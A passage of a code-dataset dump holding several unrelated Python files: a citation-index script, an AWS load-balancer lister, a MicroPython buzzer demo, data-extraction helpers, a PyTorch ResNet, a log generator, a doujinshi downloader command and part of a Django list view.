publication[3]\n\t\t\t\t\t\tcit2017 = publication[4]\n\t\t\t\t\t\tcit2018 = publication[5]\n\t\t\t\t\t\tcit2019 = publication[6]\n\t\t\t\t\t\tcit2020 = publication[7]\n\t\t\t\t\t\t\n\t\t\t\t\t\tcitCurrent = totCitations - (cit2017 + cit2018 + cit2019 + cit2020)\n\t\t\t\t\t\tcitationsArray.append(citCurrent)\n\t\t\t\t\telif quadrimestre == 5:\n\t\t\t\t\t\ttotCitations = publication[3]\n\t\t\t\t\t\tcit2018 = publication[5]\n\t\t\t\t\t\tcit2019 = publication[6]\n\t\t\t\t\t\tcit2020 = publication[7]\n\t\t\t\t\t\t\n\t\t\t\t\t\tcitCurrent = totCitations - (cit2018 + cit2019 + cit2020)\n\t\t\t\t\t\tcitationsArray.append(citCurrent)\n\t\t\t\t\telse:\n\t\t\t\t\t\ttotCitations = publication[3]\n\t\t\t\t\t\tcit2019 = publication[6]\n\t\t\t\t\t\tcit2020 = publication[7]\n\t\t\t\t\t\t\n\t\t\t\t\t\tcitCurrent = totCitations - (cit2019 + cit2020)\n\t\t\t\t\t\tcitationsArray.append(citCurrent)\n\t\t\t\ti3Computed = hindex(citationsArray)\n\t\t\t\tresStr += \"%s\\t%s\\t%s\\t%s\\t%s\\t%d\\t%d\\t%d\\t%d\\t%d\\t%d\\t%d\\t%d\\t%d\\n\" % (cvid, authorId, settore, quadrimestre, fascia, i1Computed, i1, i2Computed, i2, i3Computed, i3, i1Computed-i1, i2Computed-i2, i3Computed-i3)\n\t\tprint (diffTotal)\n\n\t\twith open(outputTsvIndicatori, \"w\") as text_file:\n\t\t\ttext_file.write(resStr)\n\t\t\t\n\ndef extractTitoliFromDb(dbfile, outputTsvTitoli):\n\tconn = create_connection(dbfile)\n\twith conn:\n\t\trows = select_titoli(conn)\n\t\tresStr = \"cvid\\tauthorId 
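# --- Added reference (hindex() itself is defined elsewhere in this script) -
# A minimal equivalent, assuming it implements the standard Hirsch definition:
def hindex_sketch(citations):
	# largest h such that at least h papers have >= h citations each
	h = 0
	for i, c in enumerate(sorted(citations, reverse=True), start=1):
		if c >= i:
			h = i
		else:
			break
	return h
# --------------------------------------------------------------------------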
Scopus\\tsettore\\tquadrimestre\\tfascia\\ttitolo-01\\ttitolo-02\\ttitolo-03\\ttitolo-04\\ttitolo-05\\ttitolo-06\\ttitolo-07\\ttitolo-08\\ttitolo-09\\ttitolo-10\\ttitolo-11\\n\"\n\t\tfor row in rows:\n\t\t\tresStr += (\"\\t\".join(str(x) for x in row) + \"\\n\")\n\t\t\n\t\twith open(outputTsvTitoli, \"w\") as text_file:\n\t\t\ttext_file.write(resStr)\n\n\ndef select_pubsForUpdate(conn, cvid):\n\tquery_publications = \"\"\"\n\t\tSELECT publication.eid, publication.doi, publication.title, publication.venueName, wroteRelation.authorId\n\t\tFROM curriculum\n\t\tINNER JOIN wroteRelation\n\t\tON\n\t\t curriculum.authorId = wroteRelation.authorId\n\t\tINNER JOIN publication\n\t\tON\n\t\t wroteRelation.eid = publication.eid\n\t\tWHERE curriculum.id = '{curriculumId}'\n\t\"\"\"\n\tcur = conn.cursor()\n\tcur.execute(query_publications.format(curriculumId=cvid))\n\trows = cur.fetchall()\n\treturn rows\n\n\ndef lcs(X, Y, m, n): \n\tL = [[0 for i in range(n + 1)] \n\t\t\tfor i in range(m + 1)] \n\t\t\t \n\t# Following steps build \n\t# L[m+1][n+1] in bottom \n\t# up fashion. Note that \n\t# L[i][j] contains length \n\t# of LCS of X[0..i-1] and Y[0..j-1] \n\tfor i in range(m + 1): \n\t\tfor j in range(n + 1): \n\t\t\tif i == 0 or j == 0: \n\t\t\t\tL[i][j] = 0\n\t\t\telif X[i - 1] == Y[j - 1]: \n\t\t\t\tL[i][j] = L[i - 1][j - 1] + 1\n\t\t\telse: \n\t\t\t\tL[i][j] = max(L[i - 1][j], \n\t\t\t\t\t\t\t L[i][j - 1]) \n\t\t# L[m][n] contains length of \n\t\t# LCS for X[0..n-1] and Y[0..m-1] \n\treturn L[m][n] \n\t \n# Returns cost of making X[] \n# and Y[] identical. costX is \n# cost of removing a character \n# from X[] and costY is cost \n# of removing a character from Y[] \ndef findMinCost(X, Y, costX, costY): \n\t \n\t# Find LCS of X[] and Y[] \n\tm = len(X) \n\tn = len(Y) \n\tlen_LCS =lcs(X, Y, m, n) \n\t \n\t# Cost of making two strings \n\t# identical is SUM of following two \n\t# 1) Cost of removing extra \n\t# characters from first string \n\t# 2) Cost of removing extra \n\t# characters from second string \n\treturn (costX * (m - len_LCS) +\n\t\t\tcostY * (n - len_LCS)) \n\n\ndef match(cvPub, scopusPubs,minTitleLength=18,maxDifferenceCost=15):\n\t#index_cvPub = cvPub[\"id\"]\n\ttemp = (\" \".join(cvPub[\"rawcontent\"]))\n\ttext_cvPub = ''.join(x for x in temp if x.isalpha()).lower()\n\t\n\tfor scopusPub in scopusPubs:\n\t\t# match DOI scopus in the cv \n\t\tif scopusPub[\"doi\"] is not None and str(scopusPub[\"doi\"]) in temp:\n\t\t\t#return index_cvPub\n\t\t\treturn scopusPub[\"eid\"]\n\n\tfor scopusPub in scopusPubs:\n\t\tscopusTitle = \"\".join(x for x in scopusPub[\"title\"] if x.isalpha()).lower()\n\t\ttry:\n\t\t\tscopusVenue = \"\".join(x for x in scopusPub[\"venue\"] if x.isalpha()).lower()\n\t\t\tif scopusTitle in text_cvPub and scopusVenue in text_cvPub:\n\t\t\t\treturn scopusPub[\"eid\"]\n\t\texcept:\n\t\t\tpass\n\t\tif scopusTitle in text_cvPub and len(scopusTitle) > minTitleLength:\n\t\t\treturn scopusPub[\"eid\"]\n\t\t\n\tfor scopusPub in scopusPubs:\n\t\tscopusTitle = \"\".join(x for x in scopusPub[\"title\"] if x.isalpha()).lower()\n\t\ttry:\n\t\t\ttitolo_cvPub = \"\".join(x for x in cvPub[\"parsed\"][\"titolo\"] if x.isalpha()).lower()\n\t\t\tif findMinCost(titolo_cvPub, scopusTitle,1,1) < maxDifferenceCost and len(scopusTitle) > minTitleLength:\n\t\t\t\treturn scopusPub[\"eid\"]\n\t\texcept:\n\t\t\tpass\n\treturn None\n\n\ndef create_wroteRelation_withIndex(conn, record):\n\t\"\"\"\n\tCreate a new wroteRelation record into the wroteRelationIndexCv table\n\t:param conn:\n\t:param 
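# --- Added aside (illustrative check of lcs()/findMinCost() above, not in
# the original script). LCS("kitten", "sitting") is "ittn" (length 4), so
# with unit costs the total removal cost is (6 - 4) + (7 - 4) = 5:
def _check_findMinCost():
	assert lcs("kitten", "sitting", 6, 7) == 4
	assert findMinCost("kitten", "sitting", 1, 1) == 5
# --------------------------------------------------------------------------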
record:\n\t:return: wroteRelationIndex id\n\t\"\"\"\n\tsql = ''' INSERT INTO wroteRelationIndexCv(idCv,authorId,eid,indexPubIndCv,totPubIndCv)\n\t\t\t VALUES(?,?,?,?,?) '''\n\tcur = conn.cursor()\n\tcur.execute(sql, record)\n\treturn cur.lastrowid\n\n\ndef removeEidFromScopusPubs(eidMatched,scopusPubs):\n\tfor scopusPub in scopusPubs:\n\t\tif scopusPub[\"eid\"] == eidMatched:\n\t\t\tscopusPubs.remove(scopusPub)\n\t\t\ndef updateDbPublicationInCv(dbfile):\n\tconn = create_connection(dbfile)\n\twith conn:\n\t\tsql_create_wroteRelationIndexCv_table = \"\"\" CREATE TABLE IF NOT EXISTS wroteRelationIndexCv (\n\t\t\t\t\t\t\t\t\t\tidCv integer NOT NULL,\n\t\t\t\t\t\t\t\t\t\tauthorId integer NOT NULL,\n\t\t\t\t\t\t\t\t\t\teid string,\n\t\t\t\t\t\t\t\t\t\tindexPubIndCv integer,\n\t\t\t\t\t\t\t\t\t\ttotPubIndCv integer,\n\t\t\t\t\t\t\t\t\t\tFOREIGN KEY (eid) REFERENCES authorScopus(id),\n\t\t\t\t\t\t\t\t\t\tFOREIGN KEY (eid) REFERENCES publication(eid)\n\t\t\t\t\t\t\t\t\t); \"\"\"\n\t\tcreate_table(conn, sql_create_wroteRelationIndexCv_table)\n\t\t\n\t\tcandidati = select_cvid(conn)\n\t\tprint (len(candidati))\n\t\tfor candidato in candidati:\n\t\t\tidCv = str(candidato[0])\n\t\t\tauthorId = candidato[1]\n\t\t\tsettore = candidato[2]\n\t\t\tquadrimestre = str(candidato[3])\n\t\t\tfascia = str(candidato[4])\n\t\t\t\n\t\t\tfolder = jsonFolderCv + \"quadrimestre-\" + quadrimestre + \"/fascia-\" + fascia + \"/\" + settore.replace(\"/\",\"-\") + \"/CV/\" + idCv\n\t\t\tcontents = glob(folder + \"_*.json\")\n\t\t\tcontents.sort()\n\t\t\t\n\t\t\tfor filename in contents:\n\t\t\t\twith open(filename) as f:\n\t\t\t\t\tdata = json.load(f)\n\t\t\t\t\tcvPubs = data[\"pubbs_ind\"]\n\t\t\tnum_cvPubs = len(cvPubs)\n\t\t\tcvPubs_notMatched = list(cvPubs)\n\t\t\t\n\t\t\t# get Scopus pubs\n\t\t\tscopusPubs = list()\n\t\t\trows = select_pubsForUpdate(conn, idCv)\n\t\t\tfor row in rows:\n\t\t\t\teid = row[0]\n\t\t\t\tdoi = row[1]\n\t\t\t\ttitle = row[2]\n\t\t\t\tvenue = row[3]\n\t\t\t\tscopusPubs.append({'eid': eid, 'doi': doi, 'title': title, 'venue': venue})\n\t\t\t\n\t\t\tmatches = dict()\n\t\t\tnum_cvPubs_matched = 0\n\t\t\tfoundEids = list()\n\t\t\tfor cvPub in cvPubs:\n\t\t\t\teidMatched = match(cvPub, scopusPubs)\n\t\t\t\tindexInCv = cvPub[\"id\"]\n\t\t\t\tif eidMatched is not None: # and indexInCv != 0:\n\t\t\t\t\tnum_cvPubs_matched += 1\n\t\t\t\t\tcvPubs_notMatched.remove(cvPub)\n\n\t\t\t\t\tif eidMatched in foundEids:\n\t\t\t\t\t\tprint (\"ERROR in updateDbPublicationInCv() - eid %s already matched, current index = %s.\" % (eidMatched, indexInCv))\n\t\t\t\t\t\tprint (foundEids)\n\t\t\t\t\t\tprint (matches[eidMatched])\n\t\t\t\t\t\tsys.exit()\n\t\t\t\t\tremoveEidFromScopusPubs(eidMatched,scopusPubs)\n\t\t\t\t\tmatches[eidMatched] = indexInCv\n\t\t\t\t\tfoundEids.append(eidMatched)\n\n\t\t\tfor eid in matches.keys():\n\t\t\t\tindex = matches[eid]\n\t\t\t\ttupleWRI = (idCv,authorId,eid,index,num_cvPubs)\n\t\t\t\tcreate_wroteRelation_withIndex(conn,tupleWRI)\n\t\t\t\n\t\t\tfor scopusPub in scopusPubs:\n\t\t\t\teid = scopusPub[\"eid\"]\n\t\t\t\ttupleWRI = (idCv,authorId,eid,None,num_cvPubs)\n\t\t\t\tcreate_wroteRelation_withIndex(conn,tupleWRI)\n\t\t\t\t\t\n\t\t\tfor cvPub_notMatched in cvPubs_notMatched:\n\t\t\t\tprint (\"\\t\" + \" \".join(cvPub_notMatched[\"rawcontent\"]))\n\t\t\t\n\nfor sector in 
sectors:\n\tupdateDbPublicationInCv(database[sector])\n\t\n\tcomputeASN2016Indicators(database[sector],ASNtsvFiles_Indicatori[sector],\"CV\")\n\t\n\textractTitoliFromDb(database[sector],ASNtsvFiles_Titoli[sector])\n\n","repo_name":"DigitalDataLab/ASN16-18_CitationNetwork","sub_path":"script/07.computeASNIndexes.py","file_name":"07.computeASNIndexes.py","file_ext":"py","file_size_in_byte":22197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"71629319255","text":"import argparse\nimport boto3\n\ndef list_load_balancers(aws_profile):\n    session = boto3.Session(profile_name=aws_profile)\n    elbv2 = session.client('elbv2')\n\n    response = elbv2.describe_load_balancers()\n\n    for lb in response['LoadBalancers']:\n        lb_name = lb['LoadBalancerName']\n        lb_arn = lb['LoadBalancerArn']\n        lb_dns = lb['DNSName']\n        lb_type = lb['Type']\n        lb_scheme = lb['Scheme']\n        print(f\"Load Balancer Name: {lb_name}\")\n        print(f\"Load Balancer ARN: {lb_arn}\")\n        print(f\"DNS Name: {lb_dns}\")\n        print(f\"Type: {lb_type}\")\n        print(f\"Scheme: {lb_scheme}\")\n        print()\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser(description=\"List Load Balancers\")\n    parser.add_argument(\"--profile\", type=str, help=\"AWS profile name\")\n\n    args = parser.parse_args()\n    list_load_balancers(args.profile)\n\n","repo_name":"xniola/AWS-SDK","sub_path":"ReadOnly/LoadBalancer/show_lb.py","file_name":"show_lb.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"28421132129","text":"'''\nExperiment: DAC buzzer\nVersion: v1.0\nDate: 2019.4\nAuthor: 01Studio\nDescription: press the USER button to make the DAC output square waves of different frequencies to drive the buzzer.\n'''\n\n# Import the required modules\nfrom pyb import DAC,Switch\nfrom machine import Pin,I2C\nfrom ssd1306 import SSD1306_I2C\n\n# Initialize the I2C bus and the OLED\ni2c = I2C(sda=Pin(\"Y8\"), scl=Pin(\"Y6\"))\noled = SSD1306_I2C(128, 64, i2c, addr=0x3c)\n\nsw = Switch() # the USER button object, named sw\ndac = DAC(1) # the DAC object, output pin X5\n\n# Define 4 frequencies: 1Hz, 200Hz, 1000Hz, 5000Hz\nfreq=[1,200,1000,5000]\n\n# Square-wave samples at 8-bit resolution: 0 and 255 map to 0V and 3.3V.\n# They must be packed into a bytearray.\nbuf = bytearray(2)\nbuf[0]=0\nbuf[1]=255\n\nkey_node = 0 # button-pressed flag\ni = 0 # index into the frequency list\n\n##############################################\n# The USER button and its callback\n##############################################\ndef key():\n    global key_node\n    key_node = 1\n\nsw.callback(key) # run key() whenever the button is pressed\n\n##############################################\n# Initial OLED display\n##############################################\noled.fill(0) # clear the screen to a black background\noled.text('01Studio', 0, 0) # first line: 01Studio\noled.text('DAC-Beep', 0, 15) # second line: the experiment name\noled.text('Pls Press USER', 0, 40) # prompt to press the USER button\noled.show()\n\nwhile True:\n\n    if key_node==1: # the button was pressed\n        i = i+1\n        if i == 4:\n            i = 0\n        key_node = 0 # clear the button flag\n\n        # Make the DAC output the selected frequency\n        dac.write_timed(buf, freq[i]*len(buf), mode=DAC.CIRCULAR)\n\n        # Show the current frequency\n        oled.fill(0) # clear the screen to a black background\n        oled.text('01Studio', 0, 0) # first line: 01Studio\n        oled.text('DAC-Beep', 0, 15) # second line: the experiment name\n        oled.text(str(freq[i]) + 'Hz', 0, 40) # current frequency\n        oled.show()\n","repo_name":"01studio-lab/MicroPython_Examples","sub_path":"pyBoard v1.1(STM32F405)/1.基础实验/9.DAC/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"zh","doc_type":"code","stars":107,"dataset":"github-code","pt":"67"}
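# --- Added aside (sketch, relates to the show_lb.py record above) ---------
# describe_load_balancers() returns a single page of results; boto3's
# service paginator walks all pages. Session construction as in show_lb.py.
def list_all_load_balancer_names(session):
    elbv2 = session.client('elbv2')
    names = []
    for page in elbv2.get_paginator('describe_load_balancers').paginate():
        names.extend(lb['LoadBalancerName'] for lb in page['LoadBalancers'])
    return names
# --------------------------------------------------------------------------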
 +{"seq_id":"24992353293","text":"import numpy as np\n\ndef cutoff_data(cutoff_files):\n    \n    cutoff=np.empty(len(cutoff_files))\n    \n    length = 3\n    \n    for i in range(len(cutoff_files)):\n        \n        with open(cutoff_files[i]) as searchfile:\n            \n            for line in searchfile:\n                \n                left,sep,right = line.partition('cutoff=')\n                \n                if sep: # True iff 'cutoff=' in line\n                    \n                    cutoff[i]=right[:length]\n                    \n    return cutoff\n\n\ndef entropy_data(data_files):\n    \n    time_data = np.loadtxt(data_files[0],usecols=[0],unpack=True)\n    \n    ent_data=np.zeros([(len(data_files)-1),len(time_data)])\n    \n    for i in range(len(data_files)-1):\n        \n        ent_data[i,]= np.loadtxt(data_files[i+1],usecols=[0],unpack=True)\n        \n    return (time_data, ent_data)\n\n    \ndef expectation_data(data_files):\n    \n    time_data = np.loadtxt(data_files[0],usecols=[0],unpack=True)\n    \n    exp_data=np.zeros([len(data_files),len(time_data)])\n\n    \n    for i in range(len(data_files)):\n        \n        exp_data[i,]= np.loadtxt(data_files[i],usecols=[1],unpack=True)\n        \n    return (time_data, exp_data)\n\n    \ndef overlap_data(data_files): \n    \n    time_data = np.loadtxt(data_files[0],usecols=[0],unpack=True)\n\n    overlap_data=np.zeros([len(data_files),len(time_data)])\n    \n    for i in range(len(data_files)):\n        \n        overlap_data[i,]= np.loadtxt(data_files[i],usecols=[3],unpack=True)\n        \n    return (time_data, overlap_data)\n","repo_name":"AndrewHallam/convergence_test","sub_path":"convergence_test/data_extract.py","file_name":"data_extract.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"4583312529","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass BasicBlock(nn.Module):\n\texpansion=1\n\tdef __init__(self,in_channel,out_channel,stride=1):\n\t\tsuper().__init__()\n\t\tself.conv1=nn.Conv2d(in_channel,out_channel,kernel_size=3,stride=stride,padding=1,bias=False)\n\t\tself.bn1=nn.BatchNorm2d(out_channel)\n\t\tself.conv2=nn.Conv2d(out_channel,out_channel,kernel_size=3,padding=1,bias=False)\n\t\tself.bn2=nn.BatchNorm2d(out_channel)\n\t\tself.shortcut=nn.Sequential()\n\t\tif stride!=1 or in_channel !=out_channel*self.expansion:\n\t\t\tself.shortcut=nn.Sequential(\n\t\t\t\tnn.Conv2d(in_channel,out_channel*self.expansion,kernel_size=1,stride=stride,bias=False),\n\t\t\t\tnn.BatchNorm2d(out_channel*self.expansion)\n\t\t\t)\n\n\tdef forward(self,x):\n\t\tout=self.conv1(x)\n\t\tout=self.bn1(out)\n\t\tout=F.relu(out)\n\n\t\tout=self.conv2(out)\n\t\tout=self.bn2(out)\n\t\t\n\t\tout+=self.shortcut(x)\n\t\tout=F.relu(out)\n\t\t\n\t\treturn out\n\nclass Bottleneck(nn.Module):\n\texpansion=4\n\tdef __init__(self,in_channel,out_channel,stride=1):\n\t\tsuper().__init__()\n\t\tself.conv1=nn.Conv2d(in_channel,out_channel,kernel_size=1,bias=False)\n\t\tself.bn1=nn.BatchNorm2d(out_channel)\n\t\tself.conv2=nn.Conv2d(out_channel,out_channel,kernel_size=3,stride=stride,padding=1,bias=False)\n\t\tself.bn2=nn.BatchNorm2d(out_channel)\n\t\tself.conv3=nn.Conv2d(out_channel,out_channel*self.expansion,kernel_size=1,bias=False)\n\t\tself.bn3=nn.BatchNorm2d(out_channel*self.expansion)\n\t\tself.shortcut=nn.Sequential()\n\t\tif stride!=1 or in_channel !=out_channel*self.expansion:\n\t\t\tself.shortcut=nn.Sequential(\n\t\t\t\tnn.Conv2d(in_channel,out_channel*self.expansion,kernel_size=1,stride=stride,bias=False),\n\t\t\t\tnn.BatchNorm2d(out_channel*self.expansion)\n\t\t\t)\n\n\tdef forward(self,x):\n\t\tout=self.conv1(x)\n\t\tout=self.bn1(out)\n\t\tout=F.relu(out)\n\n\t\tout=self.conv2(out)\n\t\tout=self.bn2(out)\n\t\tout=F.relu(out)\n\n\t\tout=self.conv3(out)\n\t\tout=self.bn3(out)\n\t\t\n\t\tout+=self.shortcut(x)\n\t\tout=F.relu(out)\n\t\t\n\t\treturn out\n\nclass ResNet(nn.Module):\n\tdef 
__init__(self,block,num_blocks,num_classes=10):\n\t\tsuper().__init__()\n\t\tself.cur_channel=64\n\t\tself.conv1=nn.Conv2d(3,self.cur_channel,kernel_size=3,stride=1,padding=1,bias=False)\n\t\tself.bn1=nn.BatchNorm2d(self.cur_channel)\n\t\tself.layer1=self._make_layer(block,64,1,num_blocks[0])\n\t\tself.layer2=self._make_layer(block,128,2,num_blocks[1])\n\t\tself.layer3=self._make_layer(block,256,2,num_blocks[2])\n\t\tself.layer4=self._make_layer(block,512,2,num_blocks[3])\n\t\tself.linear=nn.Linear(self.cur_channel,num_classes)\n\t\n\tdef _make_layer(self,block,out_channel,stride,num_blocks):\n\t\tstrides=[stride]+[1]*(num_blocks-1)\n\t\tlayers=[]\n\t\tfor s in strides:\n\t\t\tlayers.append(block(self.cur_channel,out_channel,stride=s))\n\t\t\tself.cur_channel=out_channel*block.expansion\n\t\treturn nn.Sequential(*layers)\n\t\n\tdef forward(self,x):\n\t\tout=self.conv1(x)\n\t\tout=self.bn1(out)\n\t\tout=F.relu(out)\n\n\t\tout=self.layer1(out)\n\t\tout=self.layer2(out)\n\t\tout=self.layer3(out)\n\t\tout=self.layer4(out)\n\n\t\tout=F.avg_pool2d(out,kernel_size=4)\n\t\tout=torch.flatten(out,1)\n\t\tout=self.linear(out)\n\t\treturn out\n\ndef ResNet18():\n\treturn ResNet(BasicBlock,[2,2,2,2])\n\ndef ResNet50():\n\treturn ResNet(Bottleneck,[3,4,6,3])\n\ndef test():\n\tnet=ResNet50().cuda()\n\tx=torch.randn(32,3,32,32).cuda()\n\ty=net(x)\n\tprint(y.size())\n\n\n# test()","repo_name":"cppascalinux/mlp","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"11543805889","text":"import requests\nimport random\n\nlat = 40.1106\nlon = -88.2073\nconversion = 1 / 55.2428\nradius = 4\n\nurl = 'http://barleynet.herokuapp.com'\n#url = 'http://localhost:3000'\n\nfor i in range(2):\n d = {\n 'latitude': lat + (random.random()*2-1)*radius*conversion,\n 'longitude': lon + (random.random()*2-1)*radius*conversion}\n r = requests.post(url + '/api/location', data=d)\n r = r.json()\n \n d2 = {\n 'location': r['_id'],\n 'field': '57ddd756e59ee060ec05a881',\n 'description': 'Autogenerated point',\n #'red_flags': True,\n 'yield': 100 + 100000 * random.random(),\n 'yield_rate': 0.65 + 0.35 * random.random()\n }\n\n r = requests.post(url + '/api/logs', data=d2);\n print(r)\n print(r.json())","repo_name":"glassbeardglobal/budlabs-2016-backend","sub_path":"datagen/genLogs.py","file_name":"genLogs.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"34496537405","text":"#!/usr/bin/env python2.7\n# coding: utf-8\nfrom __future__ import unicode_literals, print_function\nimport signal\nimport platform\nimport time\n\nfrom nhentai.cmdline import cmd_parser, banner\nfrom nhentai.parser import doujinshi_parser, search_parser, print_doujinshi, favorites_parser\nfrom nhentai.doujinshi import Doujinshi\nfrom nhentai.downloader import Downloader\nfrom nhentai.logger import logger\nfrom nhentai.constant import BASE_URL\nfrom nhentai.utils import generate_html, generate_cbz, generate_main_html, generate_pdf, check_cookie, signal_handler, DB\n\n\ndef main():\n banner()\n options = cmd_parser()\n logger.info('Using mirror: {0}'.format(BASE_URL))\n\n from nhentai.constant import PROXY\n # constant.PROXY will be changed after cmd_parser()\n if PROXY:\n logger.info('Using proxy: {0}'.format(PROXY))\n\n # check your cookie\n check_cookie()\n\n doujinshis = []\n doujinshi_ids = []\n doujinshi_list = 
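# --- Added aside (CPU sanity check for the ResNet record above; the original
# test() assumes a GPU). Assumes the module above is saved as models.py.
import torch
from models import ResNet18

def check_resnet18_cpu():
    net = ResNet18()
    x = torch.randn(2, 3, 32, 32)  # CIFAR-10 sized batch
    y = net(x)
    assert y.size() == (2, 10)  # num_classes defaults to 10
# --------------------------------------------------------------------------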
[]\n\n    if options.favorites:\n        if not options.is_download:\n            logger.warning('You did not specify the --download option')\n\n        doujinshis = favorites_parser(options.page_range)\n\n    elif options.keyword:\n        from nhentai.constant import LANGUAGE\n        if LANGUAGE:\n            logger.info('Using default language: {0}'.format(LANGUAGE))\n            options.keyword += ', language:{}'.format(LANGUAGE)\n        doujinshis = search_parser(options.keyword, sorting=options.sorting, page=options.page)\n\n    elif not doujinshi_ids:\n        doujinshi_ids = options.id\n\n    print_doujinshi(doujinshis)\n    if options.is_download and doujinshis:\n        doujinshi_ids = [i['id'] for i in doujinshis]\n\n    if options.is_save_download_history:\n        with DB() as db:\n            data = set(db.get_all())\n\n        doujinshi_ids = list(set(doujinshi_ids) - data)\n\n    if doujinshi_ids:\n        for i, id_ in enumerate(doujinshi_ids):\n            if options.delay:\n                time.sleep(options.delay)\n\n            doujinshi_info = doujinshi_parser(id_)\n\n            if doujinshi_info:\n                doujinshi_list.append(Doujinshi(name_format=options.name_format, **doujinshi_info))\n\n            if (i + 1) % 10 == 0:\n                logger.info('Progress: %d / %d' % (i + 1, len(doujinshi_ids)))\n\n    if not options.is_show:\n        downloader = Downloader(path=options.output_dir, size=options.threads,\n                                timeout=options.timeout, delay=options.delay)\n\n        for doujinshi in doujinshi_list:\n\n            doujinshi.downloader = downloader\n            doujinshi.download()\n            if options.is_save_download_history:\n                with DB() as db:\n                    db.add_one(doujinshi.id)\n\n            if not options.is_nohtml and not options.is_cbz and not options.is_pdf:\n                generate_html(options.output_dir, doujinshi)\n            elif options.is_cbz:\n                generate_cbz(options.output_dir, doujinshi, options.rm_origin_dir)\n            elif options.is_pdf:\n                generate_pdf(options.output_dir, doujinshi, options.rm_origin_dir)\n\n        if options.main_viewer:\n            generate_main_html(options.output_dir)\n\n        if not platform.system() == 'Windows':\n            logger.log(15, '🍻 All done.')\n        else:\n            logger.log(15, 'All done.')\n\n    else:\n        [doujinshi.show() for doujinshi in doujinshi_list]\n\n\nsignal.signal(signal.SIGINT, signal_handler)\n\nif __name__ == '__main__':\n    main()\n","repo_name":"MudkipofDespair/Codes","sub_path":"command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":3468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
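# --- Added aside (sketch, not part of the original script) -----------------
# In the history filter above, set(doujinshi_ids) - data drops the original
# ordering of the IDs; an order-preserving equivalent:
def drop_already_downloaded(ids, downloaded):
    seen = set(downloaded)
    return [i for i in ids if i not in seen]
# --------------------------------------------------------------------------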
 +{"seq_id":"23982368510","text":"import json\nimport os\nimport shutil\nimport time\nimport rarfile\nfrom django.conf import settings\nfrom django.shortcuts import render, redirect\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_protect\nfrom .models import EpcamModule\nfrom django.core.paginator import Paginator, PageNotAnInteger, EmptyPage\nfrom django.db.models import Q\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, get_object_or_404\nfrom django.urls import reverse_lazy\nfrom django.utils import timezone\nfrom django.views.generic import ListView, DetailView, UpdateView, CreateView, DeleteView\nfrom .forms import JobForTestFormsReadOnly,JobForTestForm\nfrom .models import JobForTest,MyTagForEptest,Layer,Vs\nfrom account.models import QueryData, Customer\nfrom job.models import Job\nfrom cc.cc_method import CCMethod\n\n\n\n\ndef show_genres(request):\n    return render(request, \"EpcamModule.html\", {'epcam_module': EpcamModule.objects.all()})\n\n\nclass JobForTestListView(ListView):\n    queryset = JobForTest.objects.all()\n    context_object_name = 'jobfortest'\n    paginate_by = 5\n    template_name = 'JobForTestListView.html'\n\n    def get_context_data(self, **kwargs):  # override get_context_data\n        # important: start from the result of the parent method\n        context = super().get_context_data(**kwargs)\n        context['job_field_verbose_name'] = [JobForTest._meta.get_field('id').verbose_name,\n                                             JobForTest._meta.get_field('job_parent').verbose_name,\n                                             JobForTest._meta.get_field('job_name').verbose_name,\n                                             JobForTest._meta.get_field('file').verbose_name,\n                                             JobForTest._meta.get_field('file_type').verbose_name,\n                                             JobForTest._meta.get_field('test_usage_for_epcam_module').verbose_name,\n                                             JobForTest._meta.get_field('standard_odb').verbose_name,\n                                             JobForTest._meta.get_field('vs_result_ep').verbose_name,\n                                             JobForTest._meta.get_field('vs_result_g').verbose_name,\n                                             JobForTest._meta.get_field('bug_info').verbose_name,\n                                             JobForTest._meta.get_field('bool_layer_info').verbose_name,\n                                             # JobForTest._meta.get_field('vs_time_ep').verbose_name,\n                                             # JobForTest._meta.get_field('vs_time_g').verbose_name,\n                                             JobForTest._meta.get_field('status').verbose_name,\n                                             JobForTest._meta.get_field('updated').verbose_name,\n                                             JobForTest._meta.get_field('author').verbose_name,\n                                             JobForTest._meta.get_field('remark').verbose_name,\n                                             \"标签\",\n                                             \"操作\",\n                                             ]\n\n\n\n        # choice lists used by the filter widgets\n        context['select_file_usage_type'] = [('all', '所有'), ('input_test', '导入测试'), ('customer_job', '客户资料'),\n                                             ('test', '测试'), ('else', '其它')]\n        context['select_author'] = [('all', '所有'), ('mine', '我的'), ]\n        context['select_eptest_job_for_test_file_type'] = [ ('all', '所有'),('gerber274x', 'Gerber274X'), ('dxf', 'DXF'),('dwg', 'DWG'), ('odb', 'ODB'),\n                                           ('pcb', 'PCB'), ('none', 'none'), ]\n        context['select_status'] = [('all', '所有'), ('draft', '草稿'), ('published', '正式'), ]\n        context['select_eptest_job_for_test_vs_result_g'] = [('all', '所有'), ('passed', '成功'), ('failed', '失败'), ('none', '未比对'), ]\n        context['select_page'] = [('5', '5'), ('10', '10'), ('20', '20'), ('50', '50'), ('100', '100'),\n                                  ('200', '200'), ]\n\n        # print(\"len of objects-no filter:\", len(context['jobfortest']))\n\n\n        # load the current user's saved filter settings\n        try:\n            current_query_data = QueryData.objects.get(author=self.request.user)\n            # print(current_query_data)\n        except:\n            print(\"No QueryData for this user yet, so create one\")\n            new_query_data = QueryData(author=self.request.user)\n            new_query_data.save()\n            current_query_data = QueryData.objects.get(author=self.request.user)\n        print(\"current_query_data:\",current_query_data)\n\n\n        #<------------------------------ start: filtering by the saved values ---------------------------------------------------------->\n        # filter by job name\n        context['query_job_job_name'] = current_query_data.query_job_job_name\n        if 